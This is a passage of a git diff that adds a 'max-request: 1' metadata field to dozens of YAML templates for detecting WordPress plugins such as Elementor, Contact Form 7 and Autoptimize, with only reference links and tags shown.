https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index e555bf93d3..425adf0bfe 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: + max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..254f916291 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ 